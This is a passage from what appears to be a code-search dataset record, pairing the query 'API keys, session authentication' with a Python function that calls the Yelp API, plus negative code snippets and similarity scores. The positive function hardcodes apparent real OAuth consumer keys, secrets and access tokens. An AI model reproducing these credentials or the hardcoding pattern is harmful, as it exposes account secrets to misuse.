\")\"\r\n\t\t\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLDict = dict(zip(LinkedDataPropertyEnrich.inverseExpandedPropertyNameList, LinkedDataPropertyEnrich.inverseExpandedPropertyURLList))\r\n\r\n\t\t\t\t\t\t\t\tin_inverse_expanded_com_property.filter.list = LinkedDataPropertyEnrich.inverseExpandedPropertyNameList\r\n\r\n\r\n\t\t\t\t\t\t# # send a SPARQL query to DBpedia endpoint to test whether the properties are functionalProperty\r\n\t\t\t\t\t\t# isFuncnalPropertyJSONObj = SPARQLQuery.functionalPropertyQuery(LinkedDataPropertyEnrich.propertyURLList)\r\n\t\t\t\t\t\t# isFuncnalPropertyJSON = isFuncnalPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\t# FunctionalPropertySet = Set()\r\n\t\t\t\r\n\t\t\t\t\t\t# for jsonItem in isFuncnalPropertyJSON:\r\n\t\t\t\t\t\t# \tfunctionalPropertyURL = jsonItem[\"property\"][\"value\"]\r\n\t\t\t\t\t\t# \tFunctionalPropertySet.add(functionalPropertyURL)\r\n\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = FunctionalPropertySet\r\n\r\n\r\n\t\t\t\t\t\t# use set differences to get the no functional property set \r\n\t\t\t\t\t\t# propertyURLSet = Set(LinkedDataPropertyEnrich.propertyURLList)\r\n\t\t\t\t\t\t# noFunctionalPropertySet = propertyURLSet.difference(FunctionalPropertySet)\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLList = list(noFunctionalPropertySet)\r\n\r\n\t\t\t\t\t\t# for propertyURL in LinkedDataPropertyEnrich.noFunctionalPropertyURLList:\r\n\t\t\t\t\t\t# \tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t# \t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t# \t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t# \t\tpropertyName = \"dbo:\" + propertyName\r\n\t\t\t\t\t\t# \telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t# \t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t# \t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t# \t\tpropertyName = \"dbp:\" + propertyName\r\n\r\n\t\t\t\t\t\t# \tLinkedDataPropertyEnrich.noFunctionalPropertyNameList.append(propertyName)\r\n\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLDict = dict(zip(LinkedDataPropertyEnrich.noFunctionalPropertyNameList, LinkedDataPropertyEnrich.noFunctionalPropertyURLList))\r\n\r\n\r\n\t\treturn",
"def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']",
"def update_parameters(self,like_params):\n\n # get current dictionary with parameters, update and setup again\n params=self.get_params()\n\n for par in like_params:\n if par.name in params:\n params[par.name]=par.value\n\n self._setup_from_parameters(params)\n return",
"def _setup_params(self) -> None:\n self.i = 0 # Year\n self.ela = self.ela_start # Equilibrium line altitude\n self.steady_state = False # Control variable for steady state\n self.fracd8_mode = \"limited\" # Mode of the fracd8 algorithm",
"def set_parameters(self, population_size=40, num_tests=5, num_searches=5, num_enabled=17, bonus1=10, bonus2=1,\n **kwargs):\n kwargs.pop('num_searches_best', None)\n super().set_parameters(num_searches_best=0, local_searches=(mts_ls1v1, mts_ls2), **kwargs)",
"def set_params(self, w, b):\n self.w = w\n self.b = b\n return",
"def handle_post_start (self):\n\n request = ExampleHttpRequest(self, \"search.yahoo.com\")\n\n request.set_parameter(\"p\", \"python elements\")\n request.set_parameter(\"toggle\", \"1\")\n request.set_parameter(\"cop\", \"mss\")\n request.set_parameter(\"ei\", \"UTF-8\")\n request.set_parameter(\"fr\", \"yfp-t-892\")\n\n request.open(\"/search\")",
"def __init__(self, apiKey, apiSecret):\n self.apiKey = apiKey\n self.apiSecret = apiSecret",
"def manage_params(args):\n # Socrata API\n with open(\"secret/builtby-socrata.yaml\", 'r') as f:\n try:\n socrata_api_credentials = yaml.load(f)\n except yaml.YAMLError as exc:\n print(exc)\n\n socrata_app_token = socrata_api_credentials['app_token']\n\n # base params\n params = {\n '$$app_token': socrata_app_token\n }\n # remove null attributes\n args = {k: v for k, v in args.items() if v is not None}\n # add args to params\n params.update(args) # inplace\n\n return params",
"def _build_params(self, location, username, **kwargs):\n return {\n 'q': location,\n 'fuzzy': kwargs.get('fuzzy', 0.8),\n 'username': username,\n 'maxRows': kwargs.get('maxRows', 1),\n }",
"def __init__(self):\n super().__init__()\n self._api_url = API_BASE_URL\n self._api_params = API_BASE_PARAMS.copy()",
"def prep_latlng_params(self, lat, lng):\n self._api_params['latlng'] = '{},{}'.format(lat, lng)",
"def setup(self, request_params):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)",
"def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)",
"def set_api_access_keys(**kwargs):\n API_BASE_PARAMS['key'] = kwargs['key']",
"def _FillInCommonOauthParams(self, params):\n\n params['oauth_consumer_key'] = self.key\n params['oauth_nonce'] = str(random.randrange(2**64 - 1))\n params['oauth_signature_method'] = 'HMAC-SHA1'\n params['oauth_version'] = '1.0'\n params['oauth_timestamp'] = str(int(time.time()))",
"def _folium_kwargs(self):",
"def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.gtg.set_parameters(self.parameters)\n self.avoidobstacles.set_parameters(self.parameters)\n self.wall.set_parameters(self.parameters)",
"def __init__(self):\n\n self.base_url = 'https://apartments.jsmliving.com/'\n self.base_url_apartments = self.base_url + \"apartments/\"\n self.start_url = self.base_url_apartments + \"?availability=37\"\n self.apartment_urls = []\n self.apartment_data = []",
"def set_search_parameters(self, config):\n for k, v in config.items():\n self.config[k] = v",
"def setParams(self, disable=False):\n if hasattr(self, \"_input_kwargs\"):\n kwargs = self._input_kwargs\n else:\n kwargs = self.__init__._input_kwargs\n return self._set(**kwargs)",
"def __init__(self, api_key=None, secret_key=None, headers=None):\n # set up base requester\n self._base_requester = Requester(API_ENDPOINT, api_key=api_key, secret_key=secret_key, headers=headers)\n # add each endpoint\n self.geocode = self.Geocode(self._base_requester)\n self.places = self.Places(self._base_requester)",
"def set_param(self,set_dict):\n if self.query_running():\n self.params_pending = True\n self.pending_params = set_dict\n return \"Pending\"\n for param in set_dict:\n root={\"EXP\":self.app,\"DM\":self.appdoc}[param.split(\"_\")[0]]\n root.SetParam(win32com.client.constants.__dicts__[0][param],set_dict[param])\n rootd={\"EXP\":self.app_param,\"DM\":self.appdoc_param}[param.split(\"_\")[0]]\n rootd.update({param:root.GetParam(win32com.client.constants.__dicts__[0][param])[0]})\n return \"Updated\"",
"def set_params(self, params):\n for item in params:\n if len(item.split(\"-\")) == 6:\n self.params[item.split(\"-\")[-1]] = params[item]\n elif item.split(\"-\")[5] == \"BECKE88\":\n self.becke88.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE88_LR\":\n self.becke88_lr.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE88_LR_ADIABATIC\":\n self.becke88_lr_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE97\":\n self.becke97.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE_ROUSSEL\":\n self.becke_roussel.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BEEF\":\n self.beef.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"CS1\":\n self.cs1.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"GV09\":\n self.gv09.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"HCTH\":\n self.hcth.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"KE_GGA\":\n self.ke_gga.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"KE_LIBXC\":\n self.ke_libxc.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LDA_HOLE_T_C_LR\":\n self.lda_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LIBXC\":\n self.libxc.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LYP\":\n self.lyp.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LYP_ADIABATIC\":\n self.lyp_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"OPTX\":\n self.optx.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"P86C\":\n self.p86c.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PADE\":\n self.pade.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PBE\":\n self.pbe.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PBE_HOLE_T_C_LR\":\n self.pbe_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PW92\":\n self.pw92.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PZ81\":\n self.pz81.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"TF\":\n self.tf.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"TFW\":\n self.tfw.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"TPSS\":\n self.tpss.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"VWN\":\n self.vwn.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"XALPHA\":\n self.xalpha.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"XGGA\":\n self.xgga.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"XWPBE\":\n self.xwpbe.set_params({item: params[item]})\n else:\n pass",
"def set_params(self, params):\n for item in params:\n if len(item.split(\"-\")) == 5:\n self.params[item.split(\"-\")[-1]] = params[item]\n elif item.split(\"-\")[4] == \"BECKE88\":\n self.becke88.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE88_LR\":\n self.becke88_lr.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE88_LR_ADIABATIC\":\n self.becke88_lr_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE97\":\n self.becke97.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE_ROUSSEL\":\n self.becke_roussel.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BEEF\":\n self.beef.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"CS1\":\n self.cs1.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"GV09\":\n self.gv09.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"HCTH\":\n self.hcth.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"KE_GGA\":\n self.ke_gga.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"KE_LIBXC\":\n self.ke_libxc.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LDA_HOLE_T_C_LR\":\n self.lda_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LIBXC\":\n self.libxc.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LYP\":\n self.lyp.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LYP_ADIABATIC\":\n self.lyp_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"OPTX\":\n self.optx.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"P86C\":\n self.p86c.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PADE\":\n self.pade.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PBE\":\n self.pbe.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PBE_HOLE_T_C_LR\":\n self.pbe_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PW92\":\n self.pw92.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PZ81\":\n self.pz81.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"TF\":\n self.tf.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"TFW\":\n self.tfw.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"TPSS\":\n self.tpss.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"VWN\":\n self.vwn.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"XALPHA\":\n self.xalpha.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"XGGA\":\n self.xgga.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"XWPBE\":\n self.xwpbe.set_params({item: params[item]})\n else:\n pass",
"def parameters(self):",
"def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params)\n\n return self",
"def initialize_survey(self, **kwargs):",
"def set_params(self, **params):\n return self.forest.set_params(**params)",
"def _set_parameters(self, *path_params, **query_params):\n\n # take timeout\n try:\n self._timeout = int(query_params.get(\n constants.RequestConst.TIMEOUT, self._timeout\n ))\n except ValueError:\n pass\n try:\n del query_params[constants.RequestConst.TIMEOUT]\n except KeyError:\n pass\n\n # set default API call params\n for key, value in self.default_parameters.items():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n _query_params = self.query_parameters.get_params()\n\n # set API call params defined during the \"call\" invocation\n for key, value in query_params.items():\n if value is None:\n continue\n\n if key in _query_params.values():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n elif key in _query_params.keys():\n self.parameters[\n constants.RequestConst.QUERY\n ][_query_params[key]] = value\n\n if self.method == constants.RequestConst.GET:\n # transform all True and False param to 1 and 0\n for key, value in self.parameters[\n constants.RequestConst.QUERY\n ].items():\n if value is True:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.TRUE\n if value is False:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.FALSE\n\n # set optional url path params\n for value in path_params:\n self.parameters[constants.RequestConst.PATH].append(value)",
"def __init__(self):\n self._params = None",
"def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rbk[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd_emu[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rbk,Rdy,Rqcd_emu\")",
"def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)",
"def get_params(self):\n return self.params\n\n \"\"\"\n ____________________________________________________________________________\n\n Fields retrieved from search by default\n ---------------------------------------\n 'id': True,\n 'title': True,\n 'agency' : True,\n 'awardeeCity' : True,\n 'awardeeName' : True,\n 'awardeeStateCode' : True,\n 'date' : True,\n 'fundsObligatedAmt' : True,\n 'piFirstName' : True,\n 'piLastName' : True,\n\n Other retrievable fields\n ------------------------\n 'offset' : False\n 'awardeeCountryCode' : False,\n 'awardeeCounty' : False,\n 'awardeeDistrictCode' : False,\n 'awardeeZipCode' : False,\n 'cfdaNumber' : False,\n 'coPDPI' : False,\n 'startDate' : False,\n 'expDate' : False,\n 'estimatedTotalAmt' : False,\n 'fundsObligatedAmt' : True,\n 'dunsNumber' : False,\n 'fundProgramName' : False,\n 'parentDunsNumber' : False,\n 'pdPIName' : False,\n 'perfCity' : False,\n 'perfCountryCode' : False,\n 'perfCounty' : False,\n 'perfDistrictCode' : False,\n 'perfLocation' : False,\n 'perfStateCode' : False,\n 'perfZipCode' : False,\n 'poName' : False,\n 'primaryProgram' : False,\n 'transType' : False,\n 'awardee' : False,\n 'poPhone' : False,\n 'poEmail' : False,\n 'awardeeAddress' : False,\n 'perfAddress' : False,\n 'publicationResearch' : False,\n 'publicationConference' : False,\n 'fundAgencyCode' : False,\n 'awardAgencyCode' : False,\n 'projectOutComesReport' : False,\n 'abstractText' : False,\n 'piMiddeInitial' : False,\n 'piLastName' : True,\n 'piPhone' : False,\n 'piEmail' : False\n \"\"\"",
"def updateParameters(self, parameters):\r\n return"
] | [
"0.64296603",
"0.621526",
"0.61677766",
"0.6114416",
"0.59252185",
"0.5825301",
"0.5812804",
"0.5749866",
"0.57189363",
"0.5699997",
"0.56947994",
"0.5644126",
"0.56365013",
"0.56365013",
"0.56365013",
"0.56365013",
"0.56365013",
"0.5616667",
"0.5610575",
"0.5582047",
"0.55815303",
"0.557732",
"0.5560208",
"0.55590016",
"0.55509347",
"0.5540958",
"0.5502522",
"0.5495415",
"0.5480501",
"0.54764104",
"0.5474993",
"0.5470682",
"0.5465878",
"0.54424816",
"0.5440057",
"0.5406234",
"0.5337285",
"0.53184634",
"0.5317401",
"0.5313916",
"0.53062123",
"0.5304556",
"0.52939403",
"0.5261542",
"0.52577704",
"0.52275634",
"0.5225014",
"0.52093315",
"0.5205563",
"0.5205563",
"0.5189188",
"0.517505",
"0.51645774",
"0.51606816",
"0.51588666",
"0.51564246",
"0.5146203",
"0.5144623",
"0.5131748",
"0.51092476",
"0.5102404",
"0.509417",
"0.5087315",
"0.5086968",
"0.508514",
"0.5082248",
"0.50795877",
"0.50756896",
"0.50661343",
"0.5063605",
"0.50603855",
"0.505574",
"0.5054781",
"0.5048",
"0.5041805",
"0.50380445",
"0.50355464",
"0.5030583",
"0.5029587",
"0.5021807",
"0.50187016",
"0.50183207",
"0.49992892",
"0.49981442",
"0.49933824",
"0.4985326",
"0.49826014",
"0.4973048",
"0.4971605",
"0.49629048",
"0.4962741",
"0.4960407",
"0.49600947",
"0.49580318",
"0.495465",
"0.4946785",
"0.4945497",
"0.49454838",
"0.49441236",
"0.49413955",
"0.4936432"
] | 0.0 | -1 |
API keys, session authentication | def api_connect(self, params):
    # Build an OAuth1 session (the rauth package is assumed to be imported at module
    # level) using hardcoded Yelp v2 API credentials.
    consumer_key = "XwD3f3Yoe2GcjqXSd5kRkA"
    consumer_secret = "VtZMCNmBNEardBkIXo-RU7De-wU"
    token = "JymbFW3SgkWemf6aTEHUvsNoPg9Nh7hZ"
    token_secret = "S4XUSKiIcUCYnlC3q7FYgUC47co"
    session = rauth.OAuth1Session(consumer_key=consumer_key,
                                  consumer_secret=consumer_secret,
                                  access_token=token,
                                  access_token_secret=token_secret,
                                  )
    # Issue the signed GET request to the Yelp v2 Search API, close the session,
    # and return the parsed JSON response.
    request = session.get("http://api.yelp.com/v2/search", params=params)
    data = request.json()
    session.close()
    return data
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def api_authentication():\r\n apikey = request.args.get('api_key', None)\r\n from flask import _request_ctx_stack\r\n if 'Authorization' in request.headers:\r\n apikey = request.headers.get('Authorization')\r\n if apikey:\r\n user = db.session.query(model.user.User).filter_by(api_key=apikey).first()\r\n ## HACK:\r\n # login_user sets a session cookie which we really don't want.\r\n # login_user(user)\r\n if user:\r\n _request_ctx_stack.top.user = user",
"def auth(self):\n return self.api(self.token)",
"def api_key(request):\r\n user_acct = request.user\r\n return _api_response(request, {\r\n 'api_key': user_acct.api_key,\r\n 'username': user_acct.username\r\n })",
"def _get_api_key(self):\n self.api.apikey = self.api.action.user_show(id=self.username)['apikey']",
"def login_to_apic(self):\n session = Session(URL, LOGIN, PASSWORD)\n resp = session.login()\n self.assertTrue(resp.ok)\n return session",
"def __init__(self, api_key: str):\n self.session: requests.Session = requests.Session()\n self.session.headers.update({'Authorization': api_key})",
"def set_api_key(self, api_key):\n self.api_key = api_key\n self.session.auth = (\"api\", api_key)",
"def login(api_key, secret_key):\n update_session(\"X-GEMINI-APIKEY\", api_key)\n set_secret_key(secret_key.encode())\n set_login_state(True)",
"def test_get_user_api_keys(self):\n pass",
"def __init__(self):\n self.authurl = Config().auth\n self.baseurl = Config().api\n self.s = Session()\n self.s.headers = {'Accept': 'application/json'}\n data = {\"grant_type\": \"client_credentials\", \"scope\": \"/read-public\", \"client_id\": Config().client_id,\n \"client_secret\": Config().client_secret}\n r = self.s.request(method=\"post\", url=self.authurl, data=data)\n self.s.headers = {'Accept': 'application/json', \"Access token\": r.json()[\"access_token\"]}",
"def authenticate(self):\n expires = int(time.time())\n method = \"GET\"\n path = \"/realtime\"\n msg = method + path + str(expires)\n signature = hmac.new(\n self.secret, msg.encode(), digestmod=hashlib.sha256\n ).hexdigest()\n\n req = {\"op\": \"authKey\", \"args\": [self.key, expires, signature]}\n self.send_packet(req)",
"def login_to_api(self):\n\n # set the API endpoint and POST the username/password to it\n endpoint = app.config['API']['url'] + 'login'\n response = requests.post(\n endpoint,\n verify = app.config['API']['verify_ssl'],\n json = {\n 'username': self.username,\n 'password': self.password\n }\n )\n\n # if the response is good, return True\n if response.status_code == 200:\n user = response.json()\n self._id = ObjectId(user['_id'])\n self.token = user['access_token']\n return True",
"def init_api():\n global soundcloud\n import json\n \n SECRETS_VERSION = 1\n \n # Load secrets file\n if os.path.exists(config.token_cache):\n with open(config.token_cache, 'r', encoding='utf-8') as f:\n secrets = json.load(f)\n else:\n secrets = {}\n \n # Try to reuse the cached access token\n if secrets\\\n and secrets['version'] == SECRETS_VERSION\\\n and secrets['access_token_acquired_at'] + secrets['access_token_expires_in'] > time() - 5 * 60\\\n and secrets['username'] == config.username:\n \n soundcloud = Soundcloud(\n client_id=config.client_id,\n client_secret=config.client_secret,\n access_token=secrets['access_token']\n )\n return\n \n # Get a new access token\n logging.info('Getting a new access token') \n try:\n soundcloud = Soundcloud(\n client_id=config.client_id,\n client_secret=config.client_secret,\n username=config.username,\n password=config.password\n )\n except HTTPError as e:\n if e.response.status_code == 401:\n logging.critical('Incorrect API key, login or password. Please, edit config.py.')\n sys.exit(1)\n else:\n raise\n \n # Save the token\n secrets = {\n 'version': SECRETS_VERSION,\n 'username': config.username,\n 'access_token': soundcloud.access_token,\n 'access_token_acquired_at': time(),\n 'access_token_expires_in': soundcloud.token.expires_in,\n }\n \n with open(config.token_cache, 'w', encoding='utf-8') as f:\n secrets = json.dump(secrets, f, indent='\\t', ensure_ascii=False)",
"def authenticate( self ):\n\n print(\"Getting new token\")\n self.getFrob()\n self.getAuthKey()\n self.getToken()\n self.cacheToken()",
"def get_or_create_sessions(self):\n\t\tpath = f'{self.BIKE_ENDPOINT}user/current/session?{self.secret_key}'\n\t\tresponse = requests.get(path).json()\n\t\tself.check_api_key(response)\n\n\t\treturn response",
"def get_auth():\n config = configparser.RawConfigParser()\n config.read(\"speech.cfg\")\n apikey = config.get('auth', 'apikey')\n return (\"apikey\", apikey)",
"def mbta_session() -> BaseUrlSession:\n cfg = config()\n session = BaseUrlSession(cfg.api_root)\n if cfg.api_key:\n session.headers.update({\"x-api-key\": cfg.api_key})\n return session",
"def api_keys(self) -> dict:\n return self.AUTH.get_api_keys()",
"def get_auth(self):\n # Only return accepted keys from the auth_keys dictionary\n # This is to prevent exceptions thrown from keystone session\n returnDict = {}\n for key in self.creds:\n if key in self.auth_keys[self.api_version]:\n returnDict[key] = self.creds[key]\n return returnDict",
"def __init__(self, api_key=None):\n self.session = Session()\n if api_key:\n self.session.headers.update({\n 'X-API-Key': api_key,\n })\n self._load_apis()",
"def _v2_auth(self, url):\n return {\"auth\": {\n \"passwordCredentials\": {\"username\": self.user,\n \"password\": self.secret}}}",
"def basic_authentication(self, username: str, password: str) -> None:\n self.api_session.auth = (username, password)",
"def _authenticate(self, reqs, session=None):\n if not isinstance(reqs[0], dict):\n raise TypeError('The input \"req\" is not typeof dict.')\n if not isinstance(reqs[1], dict):\n raise TypeError('The input \"req\" is not typeof dict.')\n\n auth_response = {}\n req = reqs[0]\n cacert = req.get('cacert')\n endpoint_type = req.get('endpoint_type', 'publicURL')\n insecure = req.get('insecure')\n mistral_url = req.get('mistral_url')\n region_name = req.get('region_name')\n service_type = req.get('service_type', 'workflowv2')\n\n verify = self._verification_needed(cacert, insecure)\n\n if not session:\n auth = self._get_auth(**req)\n\n if auth:\n session = ks_session.Session(auth=auth, verify=verify)\n\n if session:\n if not mistral_url:\n try:\n mistral_url = session.get_endpoint(\n service_type=service_type,\n interface=endpoint_type,\n region_name=region_name\n )\n except Exception:\n mistral_url = None\n\n auth_response['mistral_url'] = mistral_url\n auth_response['session'] = session\n\n target_req = reqs[1]\n\n if \"auth_url\" in target_req:\n target_auth = self._get_auth(**target_req)\n\n if target_auth:\n\n # target cacert and insecure\n cacert = target_req.get('cacert')\n insecure = target_req.get('insecure')\n\n verify = self._verification_needed(cacert, insecure)\n\n target_session = ks_session.Session(\n auth=target_auth,\n verify=verify\n )\n\n target_auth_headers = target_session.get_auth_headers() or {}\n\n target_auth_token = target_auth_headers.get('X-Auth-Token')\n\n auth_response.update({\n api.TARGET_AUTH_TOKEN: target_auth_token,\n api.TARGET_PROJECT_ID: target_session.get_project_id(),\n api.TARGET_USER_ID: target_session.get_user_id(),\n api.TARGET_AUTH_URI: target_auth._plugin.auth_url,\n })\n\n access = target_auth.get_access(target_session)\n service_catalog = access.service_catalog\n\n if self._is_service_catalog_v2(service_catalog):\n access_data = access._data[\"access\"]\n if not len(access_data['serviceCatalog']):\n LOG.warning(\n \"Service Catalog empty, some authentication\"\n \"credentials may be missing. This can cause\"\n \"malfunction in the Mistral action executions.\")\n sc_json = jsonutils.dumps(access_data)\n auth_response[api.TARGET_SERVICE_CATALOG] = sc_json\n\n if not auth_response:\n LOG.debug(\"No valid token or password + user provided. \"\n \"Continuing without authentication\")\n return {}\n\n return auth_response",
"async def _authenticate(self, conn: AsyncConnection):\n # Docs: https://www.bitmex.com/app/apiKeys\n # https://github.com/BitMEX/sample-market-maker/blob/master/test/websocket-apikey-auth-test.py\n if self.key_id and self.key_secret:\n LOG.info('%s: Authenticate with signature', conn.uuid)\n expires = int(time.time()) + 365 * 24 * 3600 # One year\n msg = f'GET/realtime{expires}'.encode('utf-8')\n signature = hmac.new(self.key_secret.encode('utf-8'), msg, digestmod=hashlib.sha256).hexdigest()\n await conn.write(json.dumps({'op': 'authKeyExpires', 'args': [self.key_id, expires, signature]}))",
"def login(self):\n base_url = 'https://accounts.pixiv.net/login'\n login_url = 'https://accounts.pixiv.net/api/login'\n post_key_html = self.session.get(base_url, headers = self.headers, proxies = self.proxies).text\n post_key_soup = BeautifulSoup(post_key_html, 'lxml')\n post_key = post_key_soup.find('input', {'name': 'post_key'})['value']\n data = {\n 'pixiv_id': self.config['email'],\n 'password': self.config['password'],\n 'post_key': post_key\n }\n self.session.post(login_url, data = data, headers = self.headers, proxies = self.proxies)",
"def authenticate(self,keys=None):\n\n # if we have just been handed keys, stash them in self\n if keys:\n self.appID = keys['appID']\n self.mac_key_id = keys['mac_key_id']\n self.mac_key = keys['mac_key']\n debugMain('authenticate: ok, thanks for supplying keys')\n return keys\n\n # if we already have keys, we don't need to do anything.\n if self.isAuthenticated():\n debugMain('authenticate: we already have keys! doing nothing.')\n return\n\n # first, register with the server to get temp keys:\n # self.appID and self.mac_*\n # this also makes a new self.session which uses MAC authentication\n self._register()\n\n debugMain('authenticate: converting temp keys into permanent keys')\n\n # send user to the tent.is url to grant access\n # we will get the \"code\" in response\n self.state = randomString()\n params = {\n 'client_id': self.appID,\n 'redirect_uri': self.oauthCallbackUrl,\n 'state': self.state,\n 'scope': ','.join(self.scopes.keys()),\n 'tent_profile_info_types': 'all',\n 'tent_post_types': 'all',\n }\n if self.postNotificationUrl:\n params['tent_notification_url'] = self.postNotificationUrl\n requestUrl = self.apiRootUrls[0] + '/oauth/authorize'\n urlWithParams = requestUrl + '?' + urlencode(params)\n\n print '---------------------------------------------------------\\\\'\n print\n print 'Opening web browser so you can grant access on your tent server.'\n print\n print 'URL: %s'%urlWithParams\n print\n print 'After you grant access, your browser will be redirected to'\n print 'a nonexistant page. Look in the url and find the \"code\"'\n print 'parameter. Paste it here:'\n print\n print 'Example:'\n print 'http://zzzzexample.com/oauthcallback?code=15673b7718651a4dd53dc7defc88759e&state=ahyKV...'\n print ' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n print\n webbrowser.open(urlWithParams)\n code = raw_input('> ')\n print\n print '---------------------------------------------------------/'\n\n # trade the code for a permanent key\n # first make the auth headers using the credentials from the registration step\n resource = '/apps/%s/authorizations'%self.appID\n jsonPayload = {'code':code, 'token_type':'mac'}\n\n # then construct and send the request\n debugDetail()\n headers = dict(DEFAULT_HEADERS)\n headers['Content-Type'] = 'application/vnd.tent.v0+json'\n requestUrl = self.apiRootUrls[0] + resource\n debugRequest('posting to: %s'%requestUrl)\n r = retry(self.session.post, requestUrl, data=json.dumps(jsonPayload), headers=headers)\n\n # display our request\n debugDetail('request headers:')\n debugJson(r.request.headers)\n debugDetail('request data:')\n debugDetail(r.request.data)\n\n # then get the response\n debugDetail()\n debugDetail('response headers:')\n debugJson(r.headers)\n debugDetail('response text:')\n debugRaw(r.text)\n if not r.json:\n debugDetail()\n debugError('auth failed.')\n return\n 